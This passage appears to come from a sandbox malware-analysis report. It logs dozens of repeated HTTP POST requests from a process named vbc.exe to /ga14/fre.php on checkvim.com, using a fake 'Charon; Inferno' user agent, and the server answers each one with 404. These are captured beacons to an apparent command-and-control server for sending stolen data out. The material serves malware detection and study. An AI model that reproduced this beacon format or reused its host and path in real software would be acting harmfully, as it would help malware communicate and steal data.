                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:53.741503000 CEST262INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:05 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    32192.168.2.22491975.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:54.025804996 CEST263OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:54.384705067 CEST263INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:05 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    33192.168.2.22491985.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:54.678868055 CEST264OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:55.031650066 CEST265INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:06 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    34192.168.2.22491995.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:55.313486099 CEST266OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:55.687469006 CEST266INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:07 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    35192.168.2.22492005.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:55.987133980 CEST267OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:56.347594023 CEST268INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:07 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    36192.168.2.22492015.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:56.626189947 CEST268OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:56.996386051 CEST269INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:08 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    37192.168.2.22492025.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:57.284758091 CEST270OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:57.618108034 CEST270INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:08 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    38192.168.2.22492035.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:57.890671015 CEST271OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:58.297914982 CEST272INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:09 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    39192.168.2.22492045.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:58.583041906 CEST273OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:58.927284956 CEST273INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:10 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    4192.168.2.22491695.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:31.556288004 CEST224OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:31.912451982 CEST225INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:43 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    40192.168.2.22492055.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:59.242790937 CEST274OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:59.601229906 CEST275INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:10 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    41192.168.2.22492065.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:59.885917902 CEST275OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:00.245923042 CEST276INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:11 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    42192.168.2.22492075.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:00.541294098 CEST277OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:00.899846077 CEST277INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:12 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    43192.168.2.22492085.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:01.193569899 CEST278OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:01.549926996 CEST279INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:12 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    44192.168.2.22492095.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:01.859268904 CEST279OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:02.235016108 CEST280INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:13 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    45192.168.2.22492105.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:02.517045021 CEST281OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:02.885140896 CEST281INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:14 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    46192.168.2.22492115.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:03.156872988 CEST282OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:03.512490034 CEST283INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:14 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    47192.168.2.22492125.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:03.819480896 CEST284OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:04.183722019 CEST284INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:15 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    48192.168.2.22492135.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:04.459249020 CEST285OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:04.832232952 CEST286INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:16 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    49192.168.2.22492145.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:05.091180086 CEST286OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:05.442714930 CEST287INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:16 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    5192.168.2.22491705.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:33.578149080 CEST225OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:33.930838108 CEST226INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:45 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    50192.168.2.22492155.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:05.699796915 CEST288OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:06.041812897 CEST288INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:17 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    51192.168.2.22492165.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:06.324511051 CEST289OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:06.690603018 CEST290INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:18 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    52192.168.2.22492175.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:06.958702087 CEST291OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:07.319648027 CEST291INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:18 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    53192.168.2.22492185.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:07.603166103 CEST292OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:07.964447021 CEST293INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:19 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    54192.168.2.22492195.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:08.233326912 CEST293OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:08.589641094 CEST294INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:19 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    55192.168.2.22492205.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:08.841041088 CEST295OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:09.186378002 CEST295INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:20 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    56192.168.2.22492215.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:09.444019079 CEST296OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:09.822865009 CEST297INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:21 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    57192.168.2.22492225.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:10.077282906 CEST298OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:10.430119991 CEST298INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:21 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    58192.168.2.22492235.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:10.687077999 CEST299OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:11.051527977 CEST299INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:22 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    59192.168.2.22492245.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:11.328728914 CEST300OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:11.678843021 CEST301INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:51:23 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    6192.168.2.22491715.188.89.5080C:\Users\Public\vbc.exe
